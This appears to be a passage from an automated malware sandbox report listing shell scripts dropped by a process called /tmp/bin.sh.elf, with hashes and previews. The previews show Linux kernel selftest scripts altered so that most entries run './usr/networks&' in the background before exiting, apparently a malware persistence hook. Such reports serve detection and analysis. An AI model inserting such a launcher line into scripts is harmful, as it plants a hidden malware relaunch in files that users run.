                                                                        MD5:51DF5BDA7024D54AF97186914CAC65A7
                                                                        SHA1:13E8E320A2DBDC1991456ECEAF7DDBADEC8781AE
                                                                        SHA-256:17CB958D1A6B00FC5878C5E25C7CD90808BCCDCCB8D931402394A1C2E868F2DA
                                                                        SHA-512:94BF0CD487FC8B7244E77C147B778B307ABA90FC8DF5FC35C842C4504F8C5D4A28E0C2E3AA367A34C5B0C2D0F1168393E2969F9D91FF42F7F9DFD3DFCB5AAC7C
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 77.fi..if /sbin/modprobe -q test-drm_mm; then. /sbin/modprobe -q -r test-drm_mm. echo "drivers/gpu/drm_mm: ok".else. echo "drivers/gpu/drm_mm: [FAIL]". exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):207
                                                                        Entropy (8bit):4.921930769285874
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVa0vK3rKfKFp6pN+R45GrKbVMlQvQaaTypcp4DaTypc6WP4y6viXVOORgn:YLp8unVMlQYaYqaGYq5WPd6viMn
                                                                        MD5:1109E7C1992C5679CF8B73D582594BD6
                                                                        SHA1:B36BECD163CDCD51C5D6B31084320BF59A07CB80
                                                                        SHA-256:6447FC8B6AF85A486DD97842AF8705412FE7C2E3EEBD529E296A740ACB3A7F33
                                                                        SHA-512:FCDD14ADA517AF36EEC9F9B59A905F111A027F4AF550DDBE6474CE9B19AE2868D2E0DE427E8F8328A01CC32AA1815B5E4FEB7967B6F0E1807B3D11135D174394
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 77.fi..if /sbin/modprobe -q i915 mock_selftests=-1; then../sbin/modprobe -q -r i915..echo "drivers/gpu/i915: ok".else..echo "drivers/gpu/i915: [FAIL]"..exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):124
                                                                        Entropy (8bit):4.633778816869914
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxJJERGENOFGEwnk9bJjWXVOORgn:aJaGENOddxJjWMn
                                                                        MD5:24F391D61563226193252A631BC07048
                                                                        SHA1:239A891EA619047A812CF830B7EA49AE982D99AF
                                                                        SHA-256:BD78E640A265961860A4189D50EE60C48B02BE882C07193DAAA34001189668A3
                                                                        SHA-512:FF531B342B1C672C44B5EE4F7C34FF95BCF8DBB1C2637A4AF68AD1A07A651A848864AD7B0713E8F00B8B4A278A8988F38B94E7036EC8893E1524CA541E6857E1
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit.fi..tcflags="skip_hw".test_sw..tcflags="skip_sw".test_hw..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):102
                                                                        Entropy (8bit):4.638138950562586
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVamWAbVCvQuvBC9bJjWXVOORgn:UHoI5xJjWMn
                                                                        MD5:BF6CFB4EB24EF2D6770C6E88F2D48CF6
                                                                        SHA1:30F86D44F198688813975091335B034C508529A4
                                                                        SHA-256:5830A3B6E02504DED80C09F352198D9ADA04EBB8BBAD624EEB76BB774F9EFC0E
                                                                        SHA-512:BACEA9BC12AA688A2AF74D94B12CD127BACE8A09E96B5093D7E77CF80DCC5632DF91B749CB095A23D73EC0063570051AE90CD285168D10EFCEAA6E2F89345EE9
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit.else..tcflags="skip_sw"..tests_run.fi..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2769
                                                                        Entropy (8bit):5.133719950377315
                                                                        Encrypted:false
                                                                        SSDEEP:48:rmGWMuirlYJVhOCJJz5irlzd70ri1dW1rEaVSsSvMdEh/eeReICQZZ3L:0M/4Ogeh50rIE1rEa+5
                                                                        MD5:67D30EDDF203F92ABFD29A6CD1E7B5CC
                                                                        SHA1:D853778457F6A19E75D04109478E4B9A640278E5
                                                                        SHA-256:E19FD8BBE99B2A5BABE6CA40F40F694180D38C1279965B2277F0A7491C62483F
                                                                        SHA-512:1EB59594335691EE52311085BF21760B35F7A7C65ADFABACB02331A463326629D04764E2994E8DC2D50477844C8AD2DC5457B99FA8C40AD96304E6D69FD6C82B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Needed for returning to default.declare -A KVD_DEFAULTS..KVD_CHILDREN="linear hash_single hash_double".KVDL_CHILDREN="singles chunks large_chunks"..devlink_sp_resource_minimize().{..local size..local i...for i in $KVD_CHILDREN; do...size=$(devlink_resource_get kvd "$i" | jq '.["size_min"]')...devlink_resource_size_set "$size" kvd "$i"..done...for i in $KVDL_CHILDREN; do...size=$(devlink_resource_get kvd linear "$i" | \... jq '.["size_min"]')...devlink_resource_size_set "$size" kvd linear "$i"..done.}..devlink_sp_size_kvd_to_default().{..local need_reload=0..local i...for i in $KVD_CHILDREN; do...local size=$(echo "${KVD_DEFAULTS[kvd_$i]}" | jq '.["size"]')...current_size=$(devlink_resource_size_get kvd "$i")....if [ "$size" -ne "$current_size" ]; then....devlink_resource_size_set "$size" kvd "$i"....need_reload=1...fi..done...for i in $KVDL_CHILDREN; do...local size=$(echo "${KVD_DEFAULTS[kvd_linear_$i]}" | \.... jq '.["size"]')...current_size=$(
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):51
                                                                        Entropy (8bit):4.191841518357241
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORjOvSQQVOORgn:hTn
                                                                        MD5:E8B5B0C858BA91B08AB7D5854CA9A181
                                                                        SHA1:C8591F8AB15C3DBC82367F2D914E7F534760DF1C
                                                                        SHA-256:3F8F722A471E414F5B4C637579E3367E30B68A5288E4B7FC950EB149E23BE321
                                                                        SHA-512:017A894266385B29B37858BB3CEC7A57F8F8E344FCCB9EE002ABAA32596C511BB2E91891BC1C2E4CE8FF5A08C0F8DC0D03CC468024097072CCC3B894CD24BE2B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit "$RET"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):51
                                                                        Entropy (8bit):4.191841518357241
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORjOvSQQVOORgn:hTn
                                                                        MD5:E8B5B0C858BA91B08AB7D5854CA9A181
                                                                        SHA1:C8591F8AB15C3DBC82367F2D914E7F534760DF1C
                                                                        SHA-256:3F8F722A471E414F5B4C637579E3367E30B68A5288E4B7FC950EB149E23BE321
                                                                        SHA-512:017A894266385B29B37858BB3CEC7A57F8F8E344FCCB9EE002ABAA32596C511BB2E91891BC1C2E4CE8FF5A08C0F8DC0D03CC468024097072CCC3B894CD24BE2B
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit "$RET"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):6617
                                                                        Entropy (8bit):4.936895915985005
                                                                        Encrypted:false
                                                                        SSDEEP:192:O6QYwsHe5V/sceJgr69j2w7ep0wILUzrdca55dcaCqP2SUzr49XfK1:TQ668hLMng
                                                                        MD5:B28EB701E14FE1525C67BEC4C7004025
                                                                        SHA1:26BBF86610455D690F6A0122FB5F6FCDC16B1C4E
                                                                        SHA-256:39463AE65D6728E9BBE6B5DED3D40FF7359A86E0A1FD11CD0D791BA4418E6A66
                                                                        SHA-512:A6DA5A7308C7A436EC03D484831D06FE88680879CD5750530374D98E760DC5CC8C5E69B1B3BE46622D311B1D7BDAC6AF0A3C642F66A5FFAC8A1419A9CE9E2E94
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..if [ -d "${NETDEVSIM_PATH}/devices/netdevsim${DEV_ADDR}" ]; then..echo "SKIP: Device netdevsim${DEV_ADDR} already exists"..exit 1.fi..init_test().{..RET=0...test $(devlink_traps_num_get) -ne 0..check_err $? "No traps were registered"...log_test "Initialization".}..trap_action_test().{..local orig_action..local trap_name..local action...RET=0...for trap_name in $(devlink_traps_get); do...# The action of non-drop traps cannot be changed....if [ $(devlink_trap_type_get $trap_name) = "drop" ]; then....devlink_trap_action_set $trap_name "trap"....action=$(devlink_trap_action_get $trap_name)....if [ $action != "trap" ]; then.....check_err 1 "Trap $trap_name did not change action to trap"....fi.....devlink_trap_action_set $trap_name "drop"....action=$(devlink_trap_action_get $trap_name)....if [ $action != "drop" ]; then.....check_err 1 "Trap $trap_name did not change action to drop"....fi...else....orig_action=$(devlink_trap_action_get $trap_name).....devlink_trap_
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):5898
                                                                        Entropy (8bit):4.146162776904928
                                                                        Encrypted:false
                                                                        SSDEEP:96:3MAOhjI7eKMJEmxsuSKb6xsD6cs6xA9K6VL/IYs6xEBYc:8AO1frEMFqdKwU9z
                                                                        MD5:1DF9F67D8921FF10D08395A907676EB6
                                                                        SHA1:1B2C3403870B4046AFDBC6A10B547B1276F3F073
                                                                        SHA-256:B73CC123F11F6B80D7B8606DF81ABE4551EED2936063565B5B931D9EC646C7E8
                                                                        SHA-512:B1EE86E95AAF57D9CA0D632D946EB3DFFD2AAE96BBCDD3C8FD01537845A5884439BF834055C624404C6917F5820AC0B4BFD17EC2B3D7542C880A6192B28652DC
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.usage() { echo "usbip_test.sh -b <busid> -p <usbip tools path>"; exit 1; }..while getopts "h:b:p:" arg; do. case "${arg}" in..h).. usage.. ;;..b).. busid=${OPTARG}.. ;;..p).. tools_path=${OPTARG}.. ;;..*).. usage.. ;;. esac.done.shift $((OPTIND-1))..if [ -z "${busid}" ]; then..usage.fi..echo "Running USB over IP Testing on $busid";..test_end_msg="End of USB over IP Testing on $busid"..if [ $UID != 0 ]; then..echo "Please run usbip_test as root [SKIP]"..echo $test_end_msg..exit $ksft_skip.fi..echo "Load usbip_host module".if ! /sbin/modprobe -q -n usbip_host; then..echo "usbip_test: module usbip_host is not found [SKIP]"..echo $test_end_msg..exit $ksft_skip.fi..if /sbin/modprobe -q usbip_host; then..echo "usbip_test: module usbip_host is loaded [OK]".else..echo "usbip_test: module usbip_host failed to load [FAIL]"..echo $test_end_msg..exit 1.fi..echo "Load vhci_hcd module".if /sbin/modprobe -q vhci_hcd; then..echo "usbip_test: module vhci_hc
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3325
                                                                        Entropy (8bit):5.18808135613295
                                                                        Encrypted:false
                                                                        SSDEEP:96:4i60FDAurFb5F6dBYpnGaBYvMcccOpZVGM:r60hl15+KAa6vMcccOtf
                                                                        MD5:B78D6747B099C8DE9C03EA8326BC7024
                                                                        SHA1:E3E9F8A83D721B987B8EFDB6EC66921A8931CA3D
                                                                        SHA-256:032D9D4898DF28207B422C11BA4E330A970E1E41A26DD8BD447FCEC32F37F85D
                                                                        SHA-512:75DF777435C79F2C2A6699A6FB49DC26C1DC2F623B4BFCD9114D0060C5E948EEFD90ACC166B09F5458F1AEFB83605D2655BE476B9D000470988BE6BEFCB55F7E
                                                                        Malicious:false
